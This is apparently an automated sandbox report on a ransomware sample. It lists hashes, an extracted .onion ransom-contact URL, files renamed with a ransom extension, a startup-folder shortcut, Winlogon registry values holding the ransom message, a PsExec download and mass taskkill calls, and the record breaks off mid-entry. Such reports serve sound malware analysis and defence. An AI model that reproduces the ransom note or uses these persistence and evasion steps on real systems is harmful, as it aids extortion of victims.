Analysis
-
max time kernel
119s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-10-2021 12:07
Static task
static1
Behavioral task
behavioral1
Sample
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe
Resource
win10-en-20210920
General
-
Target
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe
-
Size
147KB
-
MD5
59f9c44f79f86a42138b77caaa4404c9
-
SHA1
2f32d3cdbd8bec75a605bec112d3fac8e0ea4e6d
-
SHA256
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de
-
SHA512
971d397e0684515a221ce3e89cb1651283a402de5e6c96cbf863313a57b1bc6aabe199e4fd75c4ff9dbc868346de45de838aceac9da60b6215bf283a2a1fb773
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=R4131MNE85
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=R4131MNE85
Signatures
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 26 http://live.sysinternals.com/PsExec.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 18 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process File renamed C:\Users\Admin\Pictures\LockRead.crw => C:\Users\Admin\Pictures\LockRead.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\OutConvert.crw => C:\Users\Admin\Pictures\OutConvert.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\OutConvert.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\ResolveEnable.png.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\UnlockMerge.tiff b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\CompressAssert.tiff.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\InvokeUnregister.tif => C:\Users\Admin\Pictures\InvokeUnregister.tif.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\ResolveAssert.tif => C:\Users\Admin\Pictures\ResolveAssert.tif.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\UnlockMerge.tiff => C:\Users\Admin\Pictures\UnlockMerge.tiff.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\CompressAssert.tiff b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\LockRead.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\ResolveEnable.png => C:\Users\Admin\Pictures\ResolveEnable.png.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\PingDebug.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\ResolveAssert.tif.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\UnlockMerge.tiff.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\CompressAssert.tiff => C:\Users\Admin\Pictures\CompressAssert.tiff.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\Admin\Pictures\InvokeUnregister.tif.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File renamed C:\Users\Admin\Pictures\PingDebug.crw => C:\Users\Admin\Pictures\PingDebug.crw.R4131MNE85 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Drops startup file 1 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process File opened (read-only) \??\K: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\L: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\B: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\I: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\H: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\U: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\O: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\P: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\X: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\R: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\T: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\G: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\J: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\Z: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\M: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\Q: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\W: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\A: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\S: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\F: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\V: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\N: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\E: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe File opened (read-only) \??\Y: b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY WAS HACKED AND COMPROMISED!!!" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\nWe has DOWNLOADED of your PRIVATE SENSITIVE Data!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Drops file in Windows directory 13 IoCs
Processes:
netsh.exedescription ioc process File created C:\Windows\rescache\_merged\1301087654\4010849688.pri netsh.exe File created C:\Windows\rescache\_merged\2878165772\3312292840.pri netsh.exe File created C:\Windows\rescache\_merged\3623239459\11870838.pri netsh.exe File created C:\Windows\rescache\_merged\2483382631\1144272743.pri netsh.exe File created C:\Windows\rescache\_merged\3418783148\4223189797.pri netsh.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri netsh.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri netsh.exe File created C:\Windows\rescache\_merged\1974107395\1506172464.pri netsh.exe File created C:\Windows\rescache\_merged\423379043\2764571712.pri netsh.exe File created C:\Windows\rescache\_merged\81479705\2284120958.pri netsh.exe File created C:\Windows\rescache\_merged\4272278488\927794230.pri netsh.exe File created C:\Windows\rescache\_merged\4185669309\1880392806.pri netsh.exe File created C:\Windows\rescache\_merged\1476457207\263943467.pri netsh.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4012 taskkill.exe 2204 taskkill.exe 688 taskkill.exe 904 taskkill.exe 3184 taskkill.exe 3864 taskkill.exe 3420 taskkill.exe 928 taskkill.exe 3484 taskkill.exe 3024 taskkill.exe 3660 taskkill.exe 1136 taskkill.exe 1408 taskkill.exe 2836 taskkill.exe 1740 taskkill.exe 724 taskkill.exe 4076 taskkill.exe 2936 taskkill.exe 2392 taskkill.exe 3948 taskkill.exe 1704 taskkill.exe 3052 taskkill.exe 3616 taskkill.exe 3980 taskkill.exe 1032 taskkill.exe 1112 taskkill.exe 1456 taskkill.exe 1900 taskkill.exe 2920 taskkill.exe 720 taskkill.exe 2032 taskkill.exe 4072 taskkill.exe 1920 taskkill.exe 3548 taskkill.exe 2816 taskkill.exe 3348 taskkill.exe 3528 taskkill.exe 3800 taskkill.exe 620 taskkill.exe 3996 taskkill.exe 1716 taskkill.exe 2080 taskkill.exe 2824 taskkill.exe 2212 taskkill.exe 1744 taskkill.exe 4000 taskkill.exe 1584 taskkill.exe 2920 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exepid process 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe Token: SeDebugPrivilege 3024 taskkill.exe Token: SeDebugPrivilege 1900 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 3348 taskkill.exe Token: SeDebugPrivilege 3528 taskkill.exe Token: SeDebugPrivilege 2920 taskkill.exe Token: SeDebugPrivilege 3660 taskkill.exe Token: SeDebugPrivilege 3616 taskkill.exe Token: SeDebugPrivilege 724 taskkill.exe Token: SeDebugPrivilege 1136 taskkill.exe Token: SeDebugPrivilege 3800 taskkill.exe Token: SeDebugPrivilege 4076 taskkill.exe Token: SeDebugPrivilege 3980 taskkill.exe Token: SeDebugPrivilege 620 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 720 taskkill.exe Token: SeDebugPrivilege 4012 taskkill.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeDebugPrivilege 2212 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 2936 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 3996 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeDebugPrivilege 4072 taskkill.exe Token: SeDebugPrivilege 4000 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 2836 taskkill.exe Token: SeDebugPrivilege 3548 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 688 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 904 taskkill.exe Token: SeDebugPrivilege 3420 taskkill.exe Token: SeDebugPrivilege 928 taskkill.exe Token: SeDebugPrivilege 2920 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 2080 taskkill.exe Token: SeDebugPrivilege 3948 taskkill.exe Token: SeDebugPrivilege 3484 taskkill.exe Token: SeDebugPrivilege 3184 taskkill.exe Token: SeDebugPrivilege 2824 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 1228 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exepid process 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exepid process 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription pid process target process PID 2476 wrote to memory of 3024 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3024 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3024 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3584 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 3584 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 3584 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 928 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 928 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 928 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe reg.exe PID 2476 wrote to memory of 2852 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe schtasks.exe PID 2476 wrote to memory of 2852 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe schtasks.exe PID 2476 wrote to memory of 2852 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe schtasks.exe PID 2476 wrote to memory of 1316 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1316 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1316 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1460 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1460 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1460 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1264 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1264 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1264 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 2552 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 2552 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 2552 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 732 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 732 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 732 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 388 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 388 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 388 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 4032 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 4032 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 4032 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1208 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1208 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1208 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe sc.exe PID 2476 wrote to memory of 1900 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1900 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1900 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1704 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1704 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1704 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory 